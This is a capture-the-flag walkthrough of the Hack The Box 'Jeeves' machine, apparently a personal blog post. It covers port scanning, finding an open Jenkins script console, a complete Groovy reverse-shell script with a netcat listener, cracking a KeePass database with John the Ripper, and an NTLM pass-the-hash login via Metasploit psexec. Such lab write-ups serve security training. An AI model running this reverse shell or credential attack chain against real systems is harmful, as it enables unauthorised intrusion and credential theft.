Hack The Box – Jeeves

Enumeration

As a first port of call for all machines, we’re going to enumerate by scanning open ports.

NMap Scan

$ nmap -T4 -A -v 10.10.10.63

Starting Nmap 7.70 ( https://nmap.org ) at 2018-05-15 20:47 BST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 20:47
Completed NSE at 20:47, 0.00s elapsed
Initiating NSE at 20:47
Completed NSE at 20:47, 0.00s elapsed
Initiating Ping Scan at 20:47
Scanning 10.10.10.63 [4 ports]
Completed Ping Scan at 20:47, 0.08s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 20:47
Completed Parallel DNS resolution of 1 host. at 20:47, 0.02s elapsed
Initiating SYN Stealth Scan at 20:47
Scanning 10.10.10.63 [1000 ports]
Discovered open port 445/tcp on 10.10.10.63
Discovered open port 135/tcp on 10.10.10.63
Discovered open port 80/tcp on 10.10.10.63
Discovered open port 50000/tcp on 10.10.10.63
Completed SYN Stealth Scan at 20:47, 4.45s elapsed (1000 total ports)
Initiating Service scan at 20:47
Scanning 4 services on 10.10.10.63
Completed Service scan at 20:48, 6.42s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.63
Retrying OS detection (try #2) against 10.10.10.63
Initiating Traceroute at 20:48
Completed Traceroute at 20:48, 0.05s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 20:48
Completed Parallel DNS resolution of 2 hosts. at 20:48, 0.04s elapsed
NSE: Script scanning 10.10.10.63.
Initiating NSE at 20:48
Completed NSE at 20:48, 40.06s elapsed
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
Nmap scan report for 10.10.10.63
Host is up (0.039s latency).
Not shown: 996 filtered ports
PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp   open  msrpc        Microsoft Windows RPC
445/tcp   open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open  http         Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows 10 1511 - 1607 (87%), Microsoft Windows 8.1 Update 1 (86%), Microsoft Windows Phone 7.5 or 8.0 (86%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows 10 1607 (85%), Microsoft Windows 10 1511 (85%), Microsoft Windows 7 or Windows Server 2008 R2 (85%), Microsoft Windows Server 2008 R2 or Windows 8.1 (85%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.909 days (since Sun May 13 23:00:10 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 4h59m20s, deviation: 0s, median: 4h59m20s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2018-05-16 01:47:34
|_  start_date: 2018-05-14 03:59:52

TRACEROUTE (using port 445/tcp)
HOP RTT      ADDRESS
1   40.03 ms 10.10.14.1
2   40.00 ms 10.10.10.63

NSE: Script Post-scanning.
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
Initiating NSE at 20:48
Completed NSE at 20:48, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 56.05 seconds
           Raw packets sent: 2086 (95.468KB) | Rcvd: 35 (2.228KB)

We can see that the machine is running Windows of some sort. We can also see a few open ports: 80, 135, 445 and 50000.

Exploring Port 80

We know that port 80 is usually used for web servers and in the above scan we can see that the service running on that port is Microsoft IIS.

If we put the IP in to our browser we get presented with a website.

It looks like a simple clone of a good old search engine. If we enter something in to the box we’re presented with an error.

From this error we can see that the server is running Microsoft SQL Server 2005, but if you inspect the page you’ll see that it’s just an image. Maybe it’s a decoy?

Dirbuster: Port 80

Let’s see what dirbuster can find for us on port 80. We’ll use the directory-list-1.0.txt wordlist

Nothing there really. Maybe we can do a more intense scan and find something else but there are other ports to explore, so let’s move on for now.

Exploring Port 50000

Port 50000 is running a web server. Let’s have a look.

Ok so we got a 404 on this page. Let’s see what dirbuster can find for us.

Dirbuster: Port 50000

We’ll use the same wordlist that we used for port 80

After a short time, we can see an interesting folder; askjeeves.

Exploitation

So let’s stop the scan for now and head over there and we can see a Jenkins instance. By the looks of it, it’s completely open.
After a short time browsing around we can find a Script Console under Manage Jenkins.

As per the description, this script console accepts Groovey Scripts. The below script is available on frohoff’s GitHub, so either grab it there or use the below code.

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Set up a listening port on your attacking machine. I used Netcat for this;
nc -lvp 8044.

Set the host variable in the script to the IP of your attacking machine and set the port to the same as the one you’re listening on. Run the script and BOOM; we have a reverse shell.

$ nc -lvp 8044
listening on [any] 8044 ...
10.10.10.63: inverse host lookup failed: Unknown host
connect to [10.10.14.2] from (UNKNOWN) [10.10.10.63] 49677
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.

C:\Users\Administrator\.jenkins>

Have a look around the directories that you’re able to. The first flag (user.txt) can be found in C:\Users\kohsuke\Desktop. Use type to display the flag.

Now it’s time to get root flag.

Root Enumeration

Head in to kohsuke’s Documents directory and you’ll find an interesting file. CEH.kdbx is a KeePass database file. KeePass is a password manager, so this will likely contain something interesting.

We’re going to use John the Ripper to crack the master password of the file, which means you’ll need a local copy of this file.

There’s a couple of ways to do this. One is to use Netcat to set up a listener on the Jeeves box and then connect to it from your attacking machine but I think I have an issue on my system that’s stopping incomming connections, so the easiest way I found was to copy the file to the userContent folder inside the Jenkins directory (C:\Users\Administrator\.jenkins\userContent). Files placed in this directory are served up on the web server and available to get requests, ie http://10.10.10.63:50000/askjeeves/userContent/CEH.kdbx

John the Ripper

Now that you have the kdbx file we need to get a password hash. Use keepass2john to do this.
keepass2john CEH.kdbx > hash

Then we can use the rockyou wordlist with JtR to crack the hash like so
john --wordlists=rockyou.txt CEH.kdbx

After a short time you should be given a password match by JtR.
I installed KeePass at this point and opened CEH.kdbx, then entered the master password that was provided by JtR.

There are a few interesting entries in the DB, but the one we’re after is Backup stuff. View the password and you’ll actually find an NTLM Hash. This has can be used to authenticate on an SMB service and if you look at the original NMap findings, there was an SMB service available to us.

Exploitation

Open up metasploit and load up the smb exploit.
use exploit/windows/smb/psexec

Set the RHOST option to the IP of the box. Set the SMBPass option to the NTLM Hash from KeePass and lastly set the SMBUser option to Administrator as that’s who we want to authenticate as. Run exploit and you should get a meterpreter instance. From here we can drop straight in to a command prompt as the Administrator by typing shell.

The user.txt file was located on the Desktop of the kohsuke user, so let’s look at the Desktop of the Administrator first.

C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,525,425,152 bytes free

There’s a file called hm.txt but no root.txt, and if you have a look at the contents it tells us to look deeper…

C:\Users\Administrator\Desktop>type hm.txt
The flag is elsewhere.  Look deeper.

Use the /r arguement with dir to do a recursive list on Desktop and you’ll discover a hidden file

C:\Users\Administrator\Desktop>dir /r
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of C:\Users\Administrator\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               2 File(s)            833 bytes
               2 Dir(s)   7,525,425,152 bytes free

This is an Alternate Data Stream file (a good explaination can be found on the How to Geek website) and to see the contents we’ll have to use something that will accept the Data Stream such as more

The following will inject the contents of the Data Stream in to the more program and then display that content.

C:\Users\Administrator\Desktop>more < hm.txt:root.txt:$DATA
<ROOT FLAG>

You should now have your root flag!